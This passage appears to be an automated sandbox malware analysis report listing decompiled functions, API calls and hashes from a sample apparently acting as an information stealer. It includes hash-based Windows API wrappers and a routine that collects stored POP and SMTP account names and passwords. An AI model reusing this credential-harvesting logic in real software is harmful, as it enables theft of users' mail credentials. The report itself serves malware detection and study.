                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
                          				int _t6;
                          				void* _t7;
                          
                          				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
                          				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
                          				return _t6;
                          			}






                          APIs
                          • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum
                          • String ID:
                          • API String ID: 2928410991-0
                          • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                          • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                          • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                          • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                          				int _t6;
                          				void* _t7;
                          
                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                          				return _t6;
                          			}






                          APIs
                          • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040427D(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                          				return _t4;
                          			}






                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                          				long _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                          				return _t5;
                          			}






                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C08(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                          				_t4 = DeleteFileW(_a4); // executed
                          				return _t4;
                          			}






                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00402C1F(WCHAR* _a4) {
                          				struct HINSTANCE__* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                          				_t4 = LoadLibraryW(_a4); // executed
                          				return _t4;
                          			}






                          APIs
                          • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00408B2C(struct HINSTANCE__* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
                          				_t4 = FreeLibrary(_a4); // executed
                          				return _t4;
                          			}






                          APIs
                          • FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                          • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                          • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                          • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BEF(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                          				_t4 = FindClose(_a4); // executed
                          				return _t4;
                          			}






                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BB7(WCHAR* _a4) {
                          				long _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                          				_t4 = GetFileAttributesW(_a4); // executed
                          				return _t4;
                          			}






                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                          • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                          • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004049FF(void* _a4) {
                          				long _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                          				_t3 = RegCloseKey(_a4); // executed
                          				return _t3;
                          			}






                          APIs
                          • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                          • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                          • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403B64(WCHAR* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                          				_t3 = PathFileExistsW(_a4); // executed
                          				return _t3;
                          			}






                          APIs
                          • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0
                          • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                          • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                          • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                          • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                          • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
                          				intOrPtr _v8;
                          				void* _t25;
                          				void* _t28;
                          				long _t29;
                          				signed int _t36;
                          				void* _t45;
                          				signed int _t53;
                          				signed int _t55;
                          				signed int _t58;
                          				void* _t61;
                          				void* _t63;
                          
                          				_t36 = 0x400;
                          				_t53 = 2;
                          				_t58 = 0x400;
                          				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
                          				if(_t61 == 0) {
                          					L4:
                          					_t25 = 0;
                          				} else {
                          					_v8 = 0x800;
                          					while(1) {
                          						E00402B4E(_t61, 0, _t58 + _t58);
                          						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
                          						_t13 = _t58 - 1; // 0x3ff
                          						_t63 = _t63 + 0x24;
                          						_t66 = _t28 - _t13;
                          						if(_t28 != _t13) {
                          							break;
                          						}
                          						_v8 = _v8 + 0x800;
                          						_t36 = _t36 + 0x400;
                          						E00402BAB(_t61);
                          						_t55 = 2;
                          						_t58 = _t36;
                          						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
                          						if(_t61 != 0) {
                          							continue;
                          						} else {
                          							goto L4;
                          						}
                          						goto L5;
                          					}
                          					_t29 = GetLastError();
                          					_t45 = 2;
                          					__eflags = _t29 - _t45;
                          					if(_t29 != _t45) {
                          						_t25 = _t61;
                          					} else {
                          						E00402BAB(_t61);
                          						goto L4;
                          					}
                          				}
                          				L5:
                          				return _t25;
                          			}















                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                            • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                          • GetLastError.KERNEL32 ref: 00404585
                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                          • String ID:
                          • API String ID: 4065557613-0
                          • Opcode ID: a7ed1a25bbf88e5834c69dfb6a8f660cc79c8b059c99c8b9ed313f4bc5696491
                          • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                          • Opcode Fuzzy Hash: a7ed1a25bbf88e5834c69dfb6a8f660cc79c8b059c99c8b9ed313f4bc5696491
                          • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403F9E(void* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                          				return _t3;
                          			}






                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0
                          • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                          • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                          • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C40(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                          				_t4 = CloseHandle(_a4); // executed
                          				return _t4;
                          			}






                          APIs
                          • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle
                          • String ID:
                          • API String ID: 2962429428-0
                          • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                          • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                          • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406472(long _a4) {
                          				void* _t3;
                          				void* _t4;
                          
                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                          				Sleep(_a4); // executed
                          				return _t3;
                          			}






                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                          • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                          • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t40;
                          				intOrPtr _t45;
                          				intOrPtr _t47;
                          				void* _t71;
                          				void* _t75;
                          				void* _t77;
                          
                          				_t72 = _a4;
                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                          				_t81 = _t71;
                          				if(_t71 != 0) {
                          					_push(__ebx);
                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                          					_v8 = _v8 & 0x00000000;
                          					_v20 = _t40;
                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                          					_v12 = _v12 & 0x00000000;
                          					_v32 = _t45;
                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                          					_t77 = _t75 + 0x50;
                          					_v36 = _t47;
                          					if(_v8 != 0 || _v12 != 0) {
                          						E00405872( *0x49f934, _t71, 1, 0);
                          						E00405872( *0x49f934, _t67, 1, 0);
                          						_t74 = _v16;
                          						E00405872( *0x49f934, _v16, 1, 0);
                          						E00405781( *0x49f934, _v40);
                          						E00405872( *0x49f934, _v20, 1, 0);
                          						_push(_v8);
                          						E00405762(_v16,  *0x49f934, _v24);
                          						E00405872( *0x49f934, _v28, 1, 0);
                          						E00405781( *0x49f934, _v44);
                          						E00405872( *0x49f934, _v32, 1, 0);
                          						_push(_v12);
                          						E00405762(_t74,  *0x49f934, _v36);
                          						_t77 = _t77 + 0x88;
                          					} else {
                          						_t74 = _v16;
                          					}
                          					E0040471C(_t71);
                          					E0040471C(_t67);
                          					E0040471C(_t74);
                          					E0040471C(_v20);
                          					E0040471C(_v24);
                          					E0040471C(_v28);
                          					E0040471C(_v32);
                          					E0040471C(_v36);
                          				}
                          				return 1;
                          			}






















                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E008A4173(signed int __eax, void* __edx, void* __edi) {
                          				intOrPtr* _t14;
                          				void* _t15;
                          				void* _t20;
                          				void* _t21;
                          				void* _t22;
                          				intOrPtr _t23;
                          				signed int _t32;
                          				void* _t42;
                          				void* _t43;
                          				signed int _t44;
                          				void* _t46;
                          				void* _t47;
                          
                          				_t43 = __edi;
                          				_t42 = __edx;
                          				_t44 = __eax & 0x0000ffff;
                          				E008AF990(2);
                          				_t14 = 0x5a4d;
                          				_t47 =  *0x8a0000 - _t14; // 0x5a4d
                          				if(_t47 == 0) {
                          					_t14 =  *0x8a003c; // 0xe0
                          					__eflags =  *((intOrPtr*)(_t14 + 0x8a0000)) - 0x4550;
                          					if(__eflags != 0) {
                          						goto L2;
                          					} else {
                          						__eflags =  *((intOrPtr*)(_t14 + 0x8a0018)) - 0x10b;
                          						if(__eflags != 0) {
                          							goto L2;
                          						} else {
                          							_t32 = 0;
                          							__eflags =  *((intOrPtr*)(_t14 + 0x8a0074)) - 0xe;
                          							if(__eflags > 0) {
                          								__eflags =  *(_t14 + 0x8a00e8);
                          								_t6 =  *(_t14 + 0x8a00e8) != 0;
                          								__eflags = _t6;
                          								_t32 = 0 | _t6;
                          							}
                          						}
                          					}
                          				} else {
                          					L2:
                          					_t32 = 0;
                          				}
                          				 *(_t46 - 0x1c) = _t32;
                          				asm("in al, 0xe8");
                          				asm("lds ecx, [eax]");
                          				 *_t14 =  *_t14 + _t14;
                          				_t48 = _t14;
                          				if(_t14 == 0) {
                          					E008AE9B0(0x1c);
                          				}
                          				_t15 = E008AEDFA(_t32, _t43, _t48);
                          				_t49 = _t15;
                          				if(_t15 == 0) {
                          					_t15 = E008AE9B0(0x10);
                          				}
                          				E008AFA79(_t15);
                          				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                          				if(E008AF1A3(_t32, _t43, _t44, _t49) < 0) {
                          					E008AE9B0(0x1b);
                          				}
                          				 *0x8c101c = GetCommandLineW();
                          				 *0x8bf0c8 = E008AFAB9();
                          				_t20 = E008AF457();
                          				_t51 = _t20;
                          				if(_t20 < 0) {
                          					_t20 = E008AEED7(_t32, _t42, _t43, _t44, _t51, 8);
                          				}
                          				_t21 = E008AF694(_t20, _t32, _t42, _t43, _t44);
                          				_t52 = _t21;
                          				if(_t21 < 0) {
                          					E008AEED7(_t32, _t42, _t43, _t44, _t52, 9);
                          				}
                          				_t22 = E008AEF11(1);
                          				_t53 = _t22;
                          				if(_t22 != 0) {
                          					E008AEED7(_t32, _t42, _t43, _t44, _t53, _t22);
                          				}
                          				_t23 = E008AFEF7();
                          				_push(_t44);
                          				E008A1000(0x8a0000, 0, _t23);
                          				_t45 = _t23;
                          				 *((intOrPtr*)(_t46 - 0x24)) = _t23;
